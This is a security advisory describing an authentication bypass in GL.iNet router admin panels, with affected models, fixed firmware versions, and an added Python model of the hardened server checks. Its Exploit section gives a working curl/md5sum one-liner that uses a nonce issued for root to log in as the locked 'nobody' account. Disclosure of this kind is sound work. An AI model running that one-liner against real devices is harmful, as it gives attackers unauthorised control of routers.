# Bypassing Login Mechanism with Passwordless User Login
## Description
The vulnerability involves flawed authentication logic in the admin panel. Unix accounts whose shadow-file entry is disabled or locked or has no password set, in particular those with a password field of an asterisk (*) or 'x', are still accepted by the GL.iNet application because its regular-expression check on the password field is too permissive. Additionally, the nonce generated for a specific user is not tied to that user, so a challenge issued for one username can be used to authenticate as another. The combination of these two issues enables authentication bypass.
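The two server-side checks that close this flaw, modelled in an added example that is not GL.iNet's code. It assumes the server compares the client's `hash` against `md5("user:shadow_password_field:nonce")`, mirroring the one-liner in the exploit section, and adopts a hypothetical account policy that accepts only modular-crypt hashes (fields starting with `$`). The shadow lines, hashes and the `ChallengeStore` class are constructed for the illustration.

```python
"""Added example, not GL.iNet's code: a hardened model of the challenge/login
flow the advisory describes, with the two server-side checks that close it.

Assumptions (not taken from the page): the server compares the client hash
against md5("user:shadow_password_field:nonce"), mirroring the advisory's
one-liner; account policy accepts only modular-crypt hashes ('$...').
Sample shadow lines and hashes below are constructed, not from a device.
"""
import hashlib
import secrets
import time

# Constructed sample /etc/shadow content (illustrative, not real credentials).
SAMPLE_SHADOW = """\
root:$1$constructedsalt$constructedroothash:19000:0:99999:7:::
admin:$6$constructedsalt$constructedadminhash:19000:0:99999:7:::
nobody:*:19000:0:99999:7:::
daemon:x:19000:0:99999:7:::
guest::19000:0:99999:7:::
svc:!:19000:0:99999:7:::
"""


def parse_shadow(text):
    """Map each well-formed shadow line to {username: password_field}."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            entries[fields[0]] = fields[1]
    return entries


def is_loginable(pw_field):
    """Accept only an actual password hash.

    '*' and 'x' (the cases in the advisory), an empty field, and any field
    starting with '!' (locked) are rejected; a hash must start with '$'.
    """
    if pw_field in ("", "*", "x") or pw_field.startswith("!"):
        return False
    return pw_field.startswith("$")


def expected_hash(username, pw_field, nonce):
    """Server-side value the client's 'hash' parameter must equal (assumed)."""
    return hashlib.md5(f"{username}:{pw_field}:{nonce}".encode()).hexdigest()


class ChallengeStore:
    """Issues nonces bound to the requesting username, single-use, with a TTL."""

    def __init__(self, ttl_seconds=60, clock=time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock  # injectable so expiry can be exercised offline
        self._pending = {}  # nonce -> (username, issued_at)

    def challenge(self, username):
        nonce = secrets.token_hex(16)
        self._pending[nonce] = (username, self.clock())
        return nonce

    def consume(self, nonce, username):
        """Return True only if this nonce was issued to username and is fresh.
        The nonce is removed whatever the outcome, so it cannot be retried."""
        record = self._pending.pop(nonce, None)
        if record is None:
            return False
        bound_user, issued_at = record
        if self.clock() - issued_at > self.ttl:
            return False
        return secrets.compare_digest(bound_user.encode(), username.encode())


def login(shadow, store, username, nonce, client_hash):
    """Hardened login: the nonce must belong to this user, the account must be
    loginable, and the hash must match; every failure returns False."""
    nonce_ok = store.consume(nonce, username)  # consume first: burns the nonce
    pw_field = shadow.get(username)
    if not nonce_ok or pw_field is None or not is_loginable(pw_field):
        return False
    expected = expected_hash(username, pw_field, nonce)
    return secrets.compare_digest(expected.encode(), client_hash.encode())


if __name__ == "__main__":
    shadow = parse_shadow(SAMPLE_SHADOW)
    store = ChallengeStore()
    nonce = store.challenge("root")
    # The advisory's pattern: a locked account presenting another user's nonce.
    print(login(shadow, store, "nobody", nonce, expected_hash("nobody", "*", nonce)))
    nonce = store.challenge("root")
    print(login(shadow, store, "root", nonce, expected_hash("root", shadow["root"], nonce)))
```

The nonce is consumed before the account check so that a failed attempt cannot be replayed, and the username bound at challenge time is compared against the username presented at login, which is the binding the advisory says the affected firmware lacks.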
## Affected Product
● MT6000/MT3000/MT2500/AXT1800/AX1800/B3000/A1300/X300B/X3000/XE3000/X750/SFT1200/MT1300/E750/XE300/AR750/AR750S/AR300M/AR300M16/B1300/MT300N-V2
## Affected Firmware Version
● MT6000/MT3000/MT2500/AXT1800/AX1800: 4.6.2, fixed in 4.6.4
● B3000: 4.5.18, fixed in 4.5.19
● A1300/X300B: 4.5.17, fixed in 4.5.18
● X3000/XE3000: 4.4.9, fixed in 4.4.10
● X750/SFT1200/MT1300: 4.3.18, fixed in 4.3.19
● E750/XE300/AR750/AR750S/AR300M/AR300M16/B1300/MT300N-V2: 4.3.17, fixed in 4.3.18
## Exploit
1. Bypass the authentication of the web application (admin panel) using a one-liner shell command.
```
h=$(echo -n nobody:'*':$(curl -s -k -H 'Content-Type: application/json;charset=utf-8' -d '{"jsonrpc": "2.0", "id": 1, "method": "challenge", "params": {"username": "root"}}' 'https://192.168.8.1/rpc'|cut -d '"' -f18) |md5sum|cut -d' ' -f1) && curl -s -k -H 'Content-Type: application/json;charset=utf-8' -d '{"jsonrpc": "2.0", "id": 1, "method": "login", "params": {"username": "nobody", "hash":"'$h'"}}' 'https://192.168.8.1/rpc'
```
2. Verify on the target system whether the authentication was successful.
```
ubus -v call gl-session status
```
## Impact
Once an attacker bypasses the application's authentication process, they can seek additional methods to exploit the generated valid SID. This can lead to obtaining escalated privileges and full control over the router.